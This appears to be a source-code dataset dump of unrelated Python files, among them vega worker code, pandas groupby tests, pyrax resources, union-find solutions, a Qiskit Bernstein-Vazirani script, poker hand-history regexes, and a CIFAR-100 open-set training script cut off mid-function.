cmd = cmd + "user_config_data,ClassFactory.__configs__,ClassFactory.__registry__=augment.__env_config__;"
cmd = cmd + "NetworkFactory.__network_registry__=augment.__network_config__;"
cmd = cmd + "UserConfig().load(user_config_data);"
cmd = cmd + "from vega.core.common.loader import load_conf_from_desc;"
cmd = cmd + "from vega.core.pipeline.conf import PipeStepConfig;"
cmd = cmd + "load_conf_from_desc(PipeStepConfig, ClassFactory.__configs__);"
cmd = cmd + "from vega.core.common.general import General;"
cmd = cmd + "load_conf_from_desc(General, augment.__general__);"
if 'VEGA_INIT_ENV' in os.environ:
cmd = cmd + os.environ.copy()['VEGA_INIT_ENV']
cmd = cmd + "augment.train_process()"
if is_backend:
proc = subprocess.Popen(['python3', '-c', cmd], close_fds=True, env=env)
pid = proc.pid
else:
try:
proc = subprocess.Popen(['python3', '-c', cmd], env=env)
pid = proc.pid
proc.wait(timeout=self.timeout)
except Exception:
logging.warn("Timeout worker has been killed.")
                logging.warn(traceback.format_exc())
return pid
def train_process(self):
"""Abstract base function for DistributedWorker to do the train process."""
raise NotImplementedError
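# --- Hedged illustration (added; not part of vega) ---
# A minimal subclass sketch: concrete workers override train_process(),
# which is what the pickled worker executes inside the spawned subprocess.
class _ExampleWorker(DistributedWorker):
    def train_process(self):
        # A real worker would build its trainer here; this stub only logs.
        logging.info("worker %s running with rank %s", self.worker_id, self.rank)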
| [
"[email protected]"
] | |
4ba94ad8d63b1aded9da71576d77fa7a6caafdec | 159d4ae61f4ca91d94e29e769697ff46d11ae4a4 | /venv/lib/python3.9/site-packages/pandas/tests/groupby/test_min_max.py | 25a57d24e04ef974fbd644249e8114cbe40588c9 | [
"MIT"
] | permissive | davidycliao/bisCrawler | 729db002afe10ae405306b9eed45b782e68eace8 | f42281f35b866b52e5860b6a062790ae8147a4a4 | refs/heads/main | 2023-05-24T00:41:50.224279 | 2023-01-22T23:17:51 | 2023-01-22T23:17:51 | 411,470,732 | 8 | 0 | MIT | 2023-02-09T16:28:24 | 2021-09-28T23:48:13 | Python | UTF-8 | Python | false | false | 5,733 | py | import numpy as np
import pytest
from pandas._libs.tslibs import iNaT
import pandas as pd
from pandas import (
DataFrame,
Index,
Series,
)
import pandas._testing as tm
def test_max_min_non_numeric():
# #2700
aa = DataFrame({"nn": [11, 11, 22, 22], "ii": [1, 2, 3, 4], "ss": 4 * ["mama"]})
result = aa.groupby("nn").max()
assert "ss" in result
result = aa.groupby("nn").max(numeric_only=False)
assert "ss" in result
result = aa.groupby("nn").min()
assert "ss" in result
result = aa.groupby("nn").min(numeric_only=False)
assert "ss" in result
def test_max_min_object_multiple_columns(using_array_manager):
# GH#41111 case where the aggregation is valid for some columns but not
# others; we split object blocks column-wise, consistent with
# DataFrame._reduce
df = DataFrame(
{
"A": [1, 1, 2, 2, 3],
"B": [1, "foo", 2, "bar", False],
"C": ["a", "b", "c", "d", "e"],
}
)
    df._consolidate_inplace()  # should already be consolidated, but double-check
if not using_array_manager:
assert len(df._mgr.blocks) == 2
gb = df.groupby("A")
with tm.assert_produces_warning(FutureWarning, match="Dropping invalid"):
result = gb.max(numeric_only=False)
# "max" is valid for column "C" but not for "B"
ei = Index([1, 2, 3], name="A")
expected = DataFrame({"C": ["b", "d", "e"]}, index=ei)
tm.assert_frame_equal(result, expected)
with tm.assert_produces_warning(FutureWarning, match="Dropping invalid"):
result = gb.min(numeric_only=False)
# "min" is valid for column "C" but not for "B"
ei = Index([1, 2, 3], name="A")
expected = DataFrame({"C": ["a", "c", "e"]}, index=ei)
tm.assert_frame_equal(result, expected)
def test_min_date_with_nans():
# GH26321
dates = pd.to_datetime(
Series(["2019-05-09", "2019-05-09", "2019-05-09"]), format="%Y-%m-%d"
).dt.date
df = DataFrame({"a": [np.nan, "1", np.nan], "b": [0, 1, 1], "c": dates})
result = df.groupby("b", as_index=False)["c"].min()["c"]
expected = pd.to_datetime(
Series(["2019-05-09", "2019-05-09"], name="c"), format="%Y-%m-%d"
).dt.date
tm.assert_series_equal(result, expected)
result = df.groupby("b")["c"].min()
expected.index.name = "b"
tm.assert_series_equal(result, expected)
def test_max_inat():
# GH#40767 dont interpret iNaT as NaN
ser = Series([1, iNaT])
gb = ser.groupby([1, 1])
result = gb.max(min_count=2)
expected = Series({1: 1}, dtype=np.int64)
tm.assert_series_equal(result, expected, check_exact=True)
result = gb.min(min_count=2)
expected = Series({1: iNaT}, dtype=np.int64)
tm.assert_series_equal(result, expected, check_exact=True)
# not enough entries -> gets masked to NaN
result = gb.min(min_count=3)
expected = Series({1: np.nan})
tm.assert_series_equal(result, expected, check_exact=True)
def test_max_inat_not_all_na():
# GH#40767 dont interpret iNaT as NaN
# make sure we dont round iNaT+1 to iNaT
ser = Series([1, iNaT, 2, iNaT + 1])
gb = ser.groupby([1, 2, 3, 3])
result = gb.min(min_count=2)
# Note: in converting to float64, the iNaT + 1 maps to iNaT, i.e. is lossy
expected = Series({1: np.nan, 2: np.nan, 3: iNaT + 1})
tm.assert_series_equal(result, expected, check_exact=True)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_column(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a")["b"], func)()
idx = pd.Int64Index([1, 2], name="a")
expected = Series(periods, index=idx, name="b")
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_groupby_aggregate_period_frame(func):
# GH 31471
groups = [1, 2]
periods = pd.period_range("2020", periods=2, freq="Y")
df = DataFrame({"a": groups, "b": periods})
result = getattr(df.groupby("a"), func)()
idx = pd.Int64Index([1, 2], name="a")
expected = DataFrame({"b": periods}, index=idx)
tm.assert_frame_equal(result, expected)
def test_aggregate_numeric_object_dtype():
# https://github.com/pandas-dev/pandas/issues/39329
# simplified case: multiple object columns where one is all-NaN
# -> gets split as the all-NaN is inferred as float
df = DataFrame(
{"key": ["A", "A", "B", "B"], "col1": list("abcd"), "col2": [np.nan] * 4},
).astype(object)
result = df.groupby("key").min()
expected = DataFrame(
{"key": ["A", "B"], "col1": ["a", "c"], "col2": [np.nan, np.nan]}
).set_index("key")
tm.assert_frame_equal(result, expected)
# same but with numbers
df = DataFrame(
{"key": ["A", "A", "B", "B"], "col1": list("abcd"), "col2": range(4)},
).astype(object)
result = df.groupby("key").min()
expected = DataFrame(
{"key": ["A", "B"], "col1": ["a", "c"], "col2": [0, 2]}
).set_index("key")
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("func", ["min", "max"])
def test_aggregate_categorical_lost_index(func: str):
# GH: 28641 groupby drops index, when grouping over categorical column with min/max
ds = Series(["b"], dtype="category").cat.as_ordered()
df = DataFrame({"A": [1997], "B": ds})
result = df.groupby("A").agg({"B": func})
expected = DataFrame({"B": ["b"]}, index=Index([1997], name="A"))
# ordered categorical dtype should be preserved
expected["B"] = expected["B"].astype(ds.dtype)
tm.assert_frame_equal(result, expected)
| [
"[email protected]"
] | |
fd14a8d1149199664afe6d1f9f84b157b93b7cfb | bc1b9455826f2e07976c04b20515ac4a45eaf6b6 | /pyrax/resource.py | da570dcd342c43305fcae4a4a1f9c5ba3598bcd5 | [] | no_license | gondoi/pyrax | b3df411d4c1ed8d8e1e0151e9378f7400ff782fc | 4a917f55e706b650774a305a424ed456da773f02 | refs/heads/master | 2021-01-18T11:21:13.557056 | 2012-12-19T22:49:52 | 2012-12-19T22:49:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,352 | py | # Copyright 2010 Jacob Kaplan-Moss
# Copyright 2011 OpenStack LLC.
# Copyright 2012 Rackspace
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Base utilities to build API operation managers and objects on top of.
"""
import pyrax.utils as utils
class BaseResource(object):
"""
A resource represents a particular instance of an object (server, flavor,
etc). This is pretty much just a bag for attributes.
"""
HUMAN_ID = False
NAME_ATTR = "name"
def __init__(self, manager, info, loaded=False):
self._loaded = loaded
self.manager = manager
self._info = info
self._add_details(info)
@property
def human_id(self):
"""Subclasses may override this to provide a pretty ID which can be used
for bash completion.
"""
if self.NAME_ATTR in self.__dict__ and self.HUMAN_ID:
return utils.slugify(getattr(self, self.NAME_ATTR))
return None
def _add_details(self, info):
"""
Takes the dict returned by the API call and sets the
corresponding attributes on the object.
"""
for (key, val) in info.iteritems():
setattr(self, key, val)
def __getattr__(self, key):
"""
Many objects are lazy-loaded: only their most basic details
are initially returned. The first time any of the other attributes
are referenced, a GET is made to get the full details for the
object.
"""
if not self.loaded:
self.get()
# Attribute should be set; if not, it's not valid
try:
return self.__dict__[key]
except KeyError:
raise AttributeError("'%s' object has no attribute '%s'." % (self.__class__, key))
def __repr__(self):
reprkeys = sorted(key for key in self.__dict__.keys()
if (key[0] != "_") and (key != "manager"))
info = ", ".join("%s=%s" % (key, getattr(self, key)) for key in reprkeys)
return "<%s %s>" % (self.__class__.__name__, info)
def get(self):
"""Gets the details for the object."""
# set 'loaded' first ... so if we have to bail, we know we tried.
self.loaded = True
if not hasattr(self.manager, "get"):
return
new = self.manager.get(self)
if new:
self._add_details(new._info)
def delete(self):
"""Deletes the object."""
# set 'loaded' first ... so if we have to bail, we know we tried.
self.loaded = True
if not hasattr(self.manager, "delete"):
return
self.manager.delete(self)
def __eq__(self, other):
"""
Two resource objects that represent the same entity in the cloud
should be considered equal if they have the same ID. If they
don't have IDs, but their attribute info matches, they are equal.
"""
if not isinstance(other, self.__class__):
return False
if hasattr(self, "id") and hasattr(other, "id"):
return self.id == other.id
return self._info == other._info
def reload(self):
"""
Since resource objects are essentially snapshots of the entity they
represent at the time they are created, they do not update as the
entity updates. For example, the 'status' attribute can change, but
the instance's value for 'status' will not. This method will refresh
the instance with the current state of the underlying entity.
"""
new_obj = self.manager.get(self.id)
self._add_details(new_obj._info)
def _get_loaded(self):
return self._loaded
def _set_loaded(self, val):
self._loaded = val
loaded = property(_get_loaded, _set_loaded)
| [
"[email protected]"
] | |
705bb752a9258e3bc2c8ee9f16145cfd532bc894 | 60c0ca4ef3ad20bad04311473b2f4044f54739d2 | /store/api/migrations/0005_order_sold_at.py | af648d3a29d3d09976b8254d48088c4f4700c7c2 | [] | no_license | Jimiliani/rainforest | 361915024cc2a93a9bb8621372627b2d84176271 | b1bf65ee4441d1a4980a2e65ce2cfc629b9d6a7a | refs/heads/main | 2023-06-19T18:10:38.879924 | 2021-07-21T14:54:05 | 2021-07-21T14:54:05 | 387,679,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 376 | py | # Generated by Django 3.1.5 on 2021-07-20 19:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0004_auto_20210720_2159'),
]
operations = [
migrations.AddField(
model_name='order',
name='sold_at',
field=models.DateField(null=True),
),
]
| [
"[email protected]"
] | |
c724c19fb17cb22589d49e60505ecf79ee04e7c5 | d1742451b25705fc128acc245524659628ab3e7d | /Data Structure & Algorithm/Disjoint Set Union/10685 - Nature.py | b0b9ec8421bcfe7e9e623074eb4e6f6e4a873ba0 | [] | no_license | Shovon588/Programming | ebab793a3c97aedddfcad5ea06e7e22f5c54a86e | e4922c9138998358eed09a1be7598f9b060c685f | refs/heads/master | 2022-12-23T18:29:10.141117 | 2020-10-04T17:29:32 | 2020-10-04T17:29:32 | 256,915,133 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 935 | py | def makeset(n):
par[n] = n
def find(r):
if par[r]==r:
return r
    par[r] = find(par[r])
    return par[r]
def joint(a,b):
u = find(a)
v = find(b)
if u!=v:
par[u] = v
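# Hedged mini-example (added for illustration; reassigns the global `par`
# used by makeset/find/joint, so it is defined but never called here):
def _dsu_demo():
    global par
    par = [None]*5
    for i in range(1, 5):
        makeset(i)
    joint(1, 2)
    joint(2, 3)
    # nodes 1..3 now share one representative; node 4 is still alone
    return find(1) == find(3) and find(1) != find(4)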
def generate_result(dic):
res = -1
for i in range(1,n+1):
temp = find(i)
if temp in dic:
dic[temp]+=1
res = max(res,dic[temp])
else:
dic[temp]=1
res = max(res,dic[temp])
return res
while(1):
n,m = map(int,input().split())
if n==0 and m==0:
break
par = [None]*(n+1)
animals = {}
for i in range(n):
animal = input()
animals[animal]=i+1
makeset(i+1)
for i in range(m):
first, second = map(str,input().split())
a = animals[first]
b = animals[second]
joint(a,b)
dic = {}
result = generate_result(dic)
print(result)
s = input()
| [
"[email protected]"
] | |
f386a2baff367c7b94051355314792f3ac231a3d | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p3BR/R2/benchmark/startQiskit_QC200.py | 254dea7ab62da21d4456472998e9b8a1d0c8d255 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,300 | py | # qubit number=3
# total number=37
import numpy as np
from qiskit import QuantumCircuit, execute, Aer, QuantumRegister, ClassicalRegister, transpile, BasicAer, IBMQ
from qiskit.visualization import plot_histogram
from typing import *
from pprint import pprint
from math import log2
from collections import Counter
from qiskit.test.mock import FakeVigo, FakeYorktown
kernel = 'circuit/bernstein'
def bitwise_xor(s: str, t: str) -> str:
length = len(s)
res = []
for i in range(length):
res.append(str(int(s[i]) ^ int(t[i])))
return ''.join(res[::-1])
def bitwise_dot(s: str, t: str) -> str:
length = len(s)
res = 0
for i in range(length):
res += int(s[i]) * int(t[i])
return str(res % 2)
def build_oracle(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the oracle O_f
# NOTE: use multi_control_toffoli_gate ('noancilla' mode)
# https://qiskit.org/documentation/_modules/qiskit/aqua/circuits/gates/multi_control_toffoli_gate.html
# https://quantumcomputing.stackexchange.com/questions/3943/how-do-you-implement-the-toffoli-gate-using-only-single-qubit-and-cnot-gates
# https://quantumcomputing.stackexchange.com/questions/2177/how-can-i-implement-an-n-bit-toffoli-gate
controls = QuantumRegister(n, "ofc")
target = QuantumRegister(1, "oft")
oracle = QuantumCircuit(controls, target, name="Of")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
oracle.mct(controls, target[0], None, mode='noancilla')
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
# oracle.draw('mpl', filename=(kernel + '-oracle.png'))
return oracle
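# Hedged quick check (added for illustration; the lambda and n=2 are
# assumptions, not from this file): for f(x) = 1 only on "11", build_oracle
# should reduce to a plain Toffoli with no surrounding X gates:
#
#   oracle = build_oracle(2, lambda rep: "1" if rep == "11" else "0")
#   print(oracle.draw())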
def build_circuit(n: int, f: Callable[[str], str]) -> QuantumCircuit:
# implement the Bernstein-Vazirani circuit
zero = np.binary_repr(0, n)
b = f(zero)
# initial n + 1 bits
input_qubit = QuantumRegister(n+1, "qc")
classicals = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classicals)
# inverse last one (can be omitted if using O_f^\pm)
prog.x(input_qubit[n])
# circuit begin
prog.h(input_qubit[1]) # number=1
prog.cx(input_qubit[0],input_qubit[2]) # number=11
prog.cx(input_qubit[0],input_qubit[2]) # number=31
prog.cx(input_qubit[0],input_qubit[2]) # number=34
prog.x(input_qubit[2]) # number=35
prog.cx(input_qubit[0],input_qubit[2]) # number=36
prog.cx(input_qubit[0],input_qubit[2]) # number=33
prog.h(input_qubit[2]) # number=25
prog.cz(input_qubit[0],input_qubit[2]) # number=26
prog.h(input_qubit[2]) # number=27
prog.h(input_qubit[1]) # number=7
prog.cz(input_qubit[2],input_qubit[1]) # number=8
prog.rx(-0.3989822670059037,input_qubit[1]) # number=30
prog.h(input_qubit[1]) # number=9
prog.h(input_qubit[1]) # number=18
prog.cz(input_qubit[2],input_qubit[1]) # number=19
prog.h(input_qubit[1]) # number=20
prog.y(input_qubit[1]) # number=14
prog.h(input_qubit[1]) # number=22
prog.cz(input_qubit[2],input_qubit[1]) # number=23
prog.h(input_qubit[1]) # number=24
prog.z(input_qubit[2]) # number=3
prog.x(input_qubit[1]) # number=17
prog.y(input_qubit[2]) # number=5
prog.x(input_qubit[2]) # number=21
# apply H to get superposition
for i in range(n):
prog.h(input_qubit[i])
prog.h(input_qubit[n])
prog.barrier()
# apply oracle O_f
oracle = build_oracle(n, f)
prog.append(
oracle.to_gate(),
[input_qubit[i] for i in range(n)] + [input_qubit[n]])
# apply H back (QFT on Z_2^n)
for i in range(n):
prog.h(input_qubit[i])
prog.barrier()
    # measure (the measurement itself is appended by the caller, via circuit1.measure_all() in __main__)
return prog
def get_statevector(prog: QuantumCircuit) -> Any:
state_backend = Aer.get_backend('statevector_simulator')
statevec = execute(prog, state_backend).result()
quantum_state = statevec.get_statevector()
qubits = round(log2(len(quantum_state)))
quantum_state = {
"|" + np.binary_repr(i, qubits) + ">": quantum_state[i]
for i in range(2 ** qubits)
}
return quantum_state
def evaluate(backend_str: str, prog: QuantumCircuit, shots: int, b: str) -> Any:
# Q: which backend should we use?
# get state vector
quantum_state = get_statevector(prog)
# get simulate results
# provider = IBMQ.load_account()
# backend = provider.get_backend(backend_str)
# qobj = compile(prog, backend, shots)
# job = backend.run(qobj)
# job.result()
backend = Aer.get_backend(backend_str)
# transpile/schedule -> assemble -> backend.run
results = execute(prog, backend, shots=shots).result()
counts = results.get_counts()
a = Counter(counts).most_common(1)[0][0][::-1]
return {
"measurements": counts,
# "state": statevec,
"quantum_state": quantum_state,
"a": a,
"b": b
}
def bernstein_test_1(rep: str):
"""011 . x + 1"""
a = "011"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_2(rep: str):
"""000 . x + 0"""
a = "000"
b = "0"
return bitwise_xor(bitwise_dot(a, rep), b)
def bernstein_test_3(rep: str):
"""111 . x + 1"""
a = "111"
b = "1"
return bitwise_xor(bitwise_dot(a, rep), b)
if __name__ == "__main__":
n = 2
a = "11"
b = "1"
f = lambda rep: \
bitwise_xor(bitwise_dot(a, rep), b)
prog = build_circuit(n, f)
    sample_shot = 4000
writefile = open("../data/startQiskit_QC200.csv", "w")
# prog.draw('mpl', filename=(kernel + '.png'))
IBMQ.load_account()
provider = IBMQ.get_provider(hub='ibm-q')
provider.backends()
backend = provider.get_backend("ibmq_5_yorktown")
circuit1 = transpile(prog, FakeYorktown())
circuit1.h(qubit=2)
circuit1.x(qubit=3)
circuit1.measure_all()
info = execute(circuit1,backend=backend, shots=sample_shot).result().get_counts()
print(info, file=writefile)
print("results end", file=writefile)
print(circuit1.depth(), file=writefile)
print(circuit1, file=writefile)
writefile.close()
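# Hedged note (assumption, not in the original script): without IBMQ
# credentials, the same measured circuit can be sampled locally with the Aer
# simulator already imported above:
#
#   backend = Aer.get_backend('qasm_simulator')
#   info = execute(circuit1, backend=backend, shots=sample_shot).result().get_counts()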
# ---- /Python_codes/p02573/s607211232.py (repo: Aasthaengg/IBMdataset) ----
class UnionFind:
def __init__(self, n):
self.r = [-1] * n
def root(self, x):
if self.r[x] < 0:
return x
self.r[x] = self.root(self.r[x])
return self.r[x]
def merge(self, x, y):
x, y = self.root(x), self.root(y)
if x == y:
return False
if self.r[x] > self.r[y]:
x, y = y, x
self.r[x] += self.r[y]
self.r[y] = x
return True
def size(self, x):
return -self.r[self.root(x)]
N, M = map(int, input().split())
f, uf = [set() for i in range(N)], UnionFind(N)
for _ in range(M):
A, B = map(lambda x: int(x)-1, input().split())
uf.merge(A, B)
print(max([uf.size(i) for i in range(N)]))
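# Hedged usage sketch (the sample values are assumptions): for input
#   4 3
#   1 2
#   2 3
#   1 4
# all four people join one component, so the script prints 4. The union-by-size
# step (merging the smaller root into the larger) keeps the trees shallow.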
# ---- /src/data/reg_ex/poker_888.py (repo: aaaaaa2493/poker-engine) ----
from re import compile
class Poker888:
name = '[a-zA-Z0-9_\-@\'.,$*`áàåäãçéèêíîóöôõšüúžÄÁÃÅÉÍÖÔÓÜØø´<^>+&' \
'\\\/()Ѐ£¼ñ®™~#!%\[\]|°¿?:"=ß{}æ©«»¯²¡; ]+'
identifier = compile('^\*\*\*\*\* 888poker Hand History')
identifier_snap = compile('^Snap Poker Hand History')
hand_border = compile('^$')
hand_border_888 = compile(r'\*\*\*\*\* 888poker Hand History for ')
hand_border_snap = compile(r'Snap Poker Hand History for ')
find_hand_id = compile(r'^Game ([0-9]+) \*\*\*\*\*$')
step_border = compile(r'\*\* [DSa-z ]+ \*\*')
blinds_and_date = compile(r'^\$([0-9,]+)/\$([0-9,]+) Blinds No Limit Holdem - \*\*\* '
r'(.. .. ....) ([0-9:]+)$')
blinds_and_ante_2 = compile(r'^([0-9 ]+) \$/([0-9 ]+) \$ Blinds No Limit Holdem - \*\*\* '
r'(.. .. ....) ([0-9:]+)$')
game_info = compile(r'^Tournament #([0-9]+) (\$[0-9.]+ \+ \$[0-9.]+) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
game_info_2 = compile(r'^Tournament #([0-9]+) ([0-9,]+ \$ \+ [0-9,]+ \$) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
game_info_3 = compile(r'^Tournament #([0-9]+) (\$[0-9.]+) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
game_info_4 = compile(r'^Tournament #([0-9]+) ([0-9,]+ \$) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
game_info_5 = compile(r'^Tournament #([0-9]+) (Бесплатно) - '
r'Table #([0-9]+) ([0-9]+) Max \(Real Money\)$')
find_button_seat = compile(r'^Seat ([0-9]+) is the button$')
player_init = compile(r'^Seat ([0-9]+): (' + name + r') \( \$([0-9,]+) \)$')
player_init_2 = compile(r'^Seat ([0-9]+): (' + name + r') \( ([0-9 ]+) \$ \)$')
empty_init = compile(r'^Seat ([0-9]+):[ ]{2}\( ([0-9,$ ]+) \)$')
find_ante = compile(r'^(' + name + r') posts ante \[\$([0-9,]+)\]$')
find_ante_2 = compile(r'^(' + name + r') posts ante \[([0-9 ]+) \$\]$')
find_small_blind = compile(r'^(' + name + ') posts small blind \[\$([0-9,]+)\]$')
find_small_blind_2 = compile(r'^(' + name + r') posts small blind \[([0-9 ]+) \$\]$')
find_big_blind = compile(r'^(' + name + ') posts big blind \[\$([0-9,]+)\]$')
find_big_blind_2 = compile(r'^(' + name + r') posts big blind \[([0-9 ]+) \$\]$')
find_flop = compile(r'^\[ (..), (..), (..) \]$')
find_turn = compile(r'^\[ (..) \]$')
find_river = compile(r'^\[ (..) \]$')
skip_total_number_of_players = compile(r'^Total number of players : [0-9]+$')
# actions
find_dealt_cards = compile(r'^Dealt to (' + name + ') \[ (..), (..) \]$')
find_fold = compile(r'^(' + name + ') folds$')
find_call = compile(r'^(' + name + ') calls \[\$([0-9,]+)\]$')
find_call_2 = compile(r'^(' + name + r') calls \[([0-9 ]+) \$\]$')
find_check = compile(r'^(' + name + ') checks$')
find_bet = compile(r'^(' + name + ') bets \[\$([0-9,]+)\]$')
find_bet_2 = compile(r'^(' + name + r') bets \[([0-9 ]+) \$\]$')
find_raise = compile(r'^(' + name + ') raises \[\$([0-9,]+)\]$')
find_raise_2 = compile(r'^(' + name + ') raises \[([0-9 ]+) \$\]$')
find_did_not_show = compile(r'^(' + name + r') did not show his hand$')
find_win_money = compile(r'^(' + name + ') collected \[ \$([0-9,]+) \]$')
find_win_money_2 = compile(r'^(' + name + r') collected \[ ([0-9 ]+) \$ \]$')
find_show_cards = compile(r'^(' + name + ') shows \[ (..), (..) \]$')
find_muck_cards = compile(r'^(' + name + ') mucks \[ (..), (..) \]$')
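# Hedged usage sketch (the sample line is an assumption shaped like the
# pattern, not taken from a real hand history):
#
#   m = Poker888.find_hand_id.search('Game 123456789 *****')
#   if m:
#       hand_id = m.group(1)   # -> '123456789'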
# ---- /other/57InsertInterval.py (repo: lo-tp/leetcode) ----
class Solution(object):
def insert(self, intervals, newInterval):
res = []
if intervals:
start, end = newInterval
for s, e in intervals:
if start != -1:
                    # case 1: current interval ends before the new one starts
if e < start:
res.append([s, e])
                    # case 2: current interval starts after the merged new one ends
elif end < s:
res.append([start, end])
res.append([s, e])
start = -1
else:
start, end = min(start, s), max(end, e)
else:
res.append([s, e])
if start != -1:
res.append([start, end])
else:
res.append(newInterval)
return res
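# Hedged usage sketch (the classic LeetCode 57 sample, added for illustration):
#
#   Solution().insert([[1, 3], [6, 9]], [2, 5])   # -> [[1, 5], [6, 9]]
#   Solution().insert([], [5, 7])                 # -> [[5, 7]]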
# ---- /OSR/DFP_end3/cifar100.py (repo: lvzongyao/Open-Set-Recognition-1) ----
from __future__ import print_function
import torch
import torch.nn as nn
import math
import torch.optim as optim
import torch.nn.functional as F
import torch.backends.cudnn as cudnn
import torchvision
import numpy as np
import torchvision.transforms as transforms
import os
import argparse
import sys
# from models import *
sys.path.append("../..")
import backbones.cifar as models
from datasets import CIFAR100
from Utils import adjust_learning_rate, progress_bar, Logger, mkdir_p, Evaluation
from DFPLoss import DFPLoss, DFPLoss2
from DFPNet import DFPNet
from MyPlotter import plot_feature, plot_distance, plot_gap
from helper import get_gap_stat
model_names = sorted(name for name in models.__dict__
if not name.startswith("__")
and callable(models.__dict__[name]))
os.environ["HDF5_USE_FILE_LOCKING"] = "FALSE"
# os.environ["CUDA_VISIBLE_DEVICES"] = "0,1,2,3"
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')
# Dataset preperation
parser.add_argument('--train_class_num', default=50, type=int, help='Classes used in training')
parser.add_argument('--test_class_num', default=100, type=int, help='Classes used in testing')
parser.add_argument('--includes_all_train_class', default=True, action='store_true',
help='If required all known classes included in testing')
# Others
parser.add_argument('--bs', default=256, type=int, help='batch size')
parser.add_argument('--evaluate', action='store_true', help='Evaluate without training')
# General MODEL parameters
parser.add_argument('--arch', default='ResNet18', choices=model_names, type=str, help='choosing network')
parser.add_argument('--embed_dim', default=512, type=int, help='embedding feature dimension')
parser.add_argument('--distance', default='l2', choices=['l2', 'l1', 'cosine', 'dotproduct'],
type=str, help='choosing distance metric')
parser.add_argument('--similarity', default='dotproduct', choices=['l2', 'l1', 'cosine', 'dotproduct'],
type=str, help='choosing distance metric')
parser.add_argument('--alpha', default=1.0, type=float, help='weight of distance loss')
parser.add_argument('--beta', default=1.0, type=float, help='weight of center between loss')
parser.add_argument('--theta', default=10.0, type=float, help='slope for input data distance within/out thresholds,'
'default 10.')
parser.add_argument('--sim_threshold', default=0.9, type=float, help='.')
parser.add_argument('--amplier', default=0.9, type=float, help='.')
parser.add_argument('--scaled', default='True', action='store_true',
help='If scale distance by sqrt(embed_dim)')
parser.add_argument('--norm_centroid', action='store_true', help='Normalize the centroid using L2-normailization')
parser.add_argument('--decorrelation', action='store_true', help='Normalize the centroid using L2-normailization')
# Parameters for stage 1
parser.add_argument('--stage1_resume', default='', type=str, metavar='PATH', help='path to latest checkpoint')
parser.add_argument('--stage1_es', default=50, type=int, help='epoch size')
parser.add_argument('--stage1_lr', default=0.1, type=float, help='learning rate') # works for MNIST
# Parameters for stage 2
parser.add_argument('--stage2_resume', default='', type=str, metavar='PATH', help='path to latest checkpoint')
parser.add_argument('--stage2_es', default=50, type=int, help='epoch size')
parser.add_argument('--stage2_lr', default=0.01, type=float, help='learning rate') # works for MNIST
# Parameters for stage plotting
parser.add_argument('--plot', action='store_true', help='Plotting the training set.')
parser.add_argument('--plot_max', default=0, type=int, help='max examples to plot in each class, 0 indicates all.')
parser.add_argument('--plot_quality', default=200, type=int, help='DPI of plot figure')
parser.add_argument('--bins', default=50, type=int, help='divided into n bins')
args = parser.parse_args()
device = 'cuda' if torch.cuda.is_available() else 'cpu'
args.checkpoint = './checkpoints/cifar/' + \
'/%s-%s_%s_%s-%s-%s_%s_%s' % (args.train_class_num, args.test_class_num, args.arch, args.alpha,
args.beta, args.theta, args.embed_dim, str(args.decorrelation))
if not os.path.isdir(args.checkpoint):
mkdir_p(args.checkpoint)
# folder to save figures
args.plotfolder1 = os.path.join(args.checkpoint, "plotter_Stage1")
if not os.path.isdir(args.plotfolder1):
mkdir_p(args.plotfolder1)
# folder to save figures
args.plotfolder2 = os.path.join(args.checkpoint, "plotter_Stage2")
if not os.path.isdir(args.plotfolder2):
mkdir_p(args.plotfolder2)
print('==> Preparing data..')
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
transform_test = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
])
trainset = CIFAR100(root='../../data', train=True, download=True, transform=transform_train,
train_class_num=args.train_class_num, test_class_num=args.test_class_num,
includes_all_train_class=args.includes_all_train_class)
testset = CIFAR100(root='../../data', train=False, download=True, transform=transform_test,
train_class_num=args.train_class_num, test_class_num=args.test_class_num,
includes_all_train_class=args.includes_all_train_class)
# data loader
trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.bs, shuffle=True, num_workers=4)
testloader = torch.utils.data.DataLoader(testset, batch_size=args.bs, shuffle=False, num_workers=4)
def main():
print(device)
stage1_dict = {
